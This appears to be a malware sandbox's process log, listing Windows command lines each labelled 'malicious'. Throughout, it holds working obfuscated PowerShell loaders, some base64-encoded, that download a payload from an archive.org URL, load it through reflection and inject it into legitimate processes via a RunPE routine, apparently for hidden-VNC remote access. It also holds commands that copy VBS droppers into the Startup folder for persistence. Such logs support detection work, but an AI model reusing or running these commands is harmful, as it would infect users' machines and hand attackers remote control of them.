"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
